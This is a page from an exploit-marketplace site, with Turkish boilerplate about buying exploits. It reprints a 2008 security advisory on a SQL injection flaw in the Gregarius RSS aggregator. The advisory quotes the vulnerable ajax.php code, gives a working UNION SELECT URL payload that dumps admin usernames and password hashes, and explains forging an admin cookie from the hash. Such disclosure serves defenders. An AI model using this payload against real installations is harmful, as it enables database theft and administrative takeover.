0day.today - Dunyanin En Buyuk Exploit Veritabani
![](/img/logo_green.jpg)
Biz sadece bir adet ana domain kullaniyoruz DOMAIN_LINK
Eger exploit satin alacaksaniz ve ya hizmet icin odeme yapacaksaniz, altin almaniz gerekmekte. Biz sitemizi hack amacli kullanmak istemiyoruz, yani her turlu dogru olmayan, kanunsuz ve illegal yapilan eylemler diger hesaplari olumsuz yonde etkileyebilir ve sonrasinda buna yol acan/lar, web sitelerimize ve verilere erisimi tamamen kesilir, banlanir ve hesabini tarafimizca yok edilir.
Sadece bu sitenin yonetimine itibar edin. Sahtelere Dikkat!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Oku [ anlasma ]
- Oku [ Gonder ] kurallar
- Ziyaret et [ SSS ] page
- [ Uye Ol ] profil
- [ FIYAT ]
- Eger istiyorsaniz [ satmak ]
- Eger istiyorsaniz [ almak ]
- Eger kaybederseniz [ Hesap ]
- Herhangi bir sorunuz [ [email protected] ]
- Yetkili sayfa
- Uyelik sayfasi
- Hesap sayfasini geri yukle
- SSS sayfasi
- Iletisim sayfasi
- Paylasim kurallari
- Anlasma sayfasi
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Bize ulasabilirsiniz:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Gregarius <= 0.5.4 rsargs[] Remote SQL Injection Vulnerability
============================================================== Gregarius <= 0.5.4 rsargs[] Remote SQL Injection Vulnerability ============================================================== ########################################################## # GulfTech Security Research July 29, 2008 ########################################################## # Vendor : Marco Bonetti # URL : http://www.gregarius.net/ # Version : Gregarius <= 0.5.4 # Risk : SQL Injection ########################################################## Description: Gregarius is a popular web-based RSS/RDF/ATOM feed aggregator written in php. There are some SQL Injection issues in Gregarius that allow for the disclosure of database contents and ultimately the complete compromise of the Gregarius installation via exposed admin credentials. It is advised that Gregarius users update their gregarius installations as soon as possible. SQL Injection: Gregarius contains a number of SQL Injection issues that allow for an attacker to expose admin credentials with no kind of authentication needed. Lets have a look at the following code taken from /ajax.php function __exp__getFeedContent($cid) { ob_start(); rss_require('cls/items.php'); $readItems = new ItemList(); $readItems -> populate(" not(i.unread & ". RSS_MODE_UNREAD_STATE .") and i.cid= $cid", "", 0, 2, ITEM_SORT_HINT_READ); $readItems -> setTitle(LBL_H2_RECENT_ITEMS); $readItems -> setRenderOptions(IL_TITLE_NO_ESCAPE); foreach ($readItems -> feeds[0] -> items as $item) { $item -> render(); } $c = ob_get_contents(); ob_end_clean(); return "$cid|@|$c"; } The above function is called by sajax_handle_client_request() and allows for an attacker to specify the content of $cid via the rsargs[] array. This being the case an attacker is able to influence the query regardless of magic_quotes_gps settings etc. /ajax.php?rs=__exp__getFeedContent&rsargs[]=-99 UNION SELECT concat( char(58),uname,char(58),password),2,3,4,5,6,7,8,9,0,1,2,3 FROM users/* The above query would successfully dump the users table to the browser. The password hashes in the database are md5 encrypted, but an attacker only need to md5 encrypt that password hash and place it in a cookie with the format of user|hash to gain access to the administrative controls. Solution: The Gregarius developers have been made aware of this issue, and users are encouraged to upgrade as soon as possible. # 0day.today [2024-07-02] #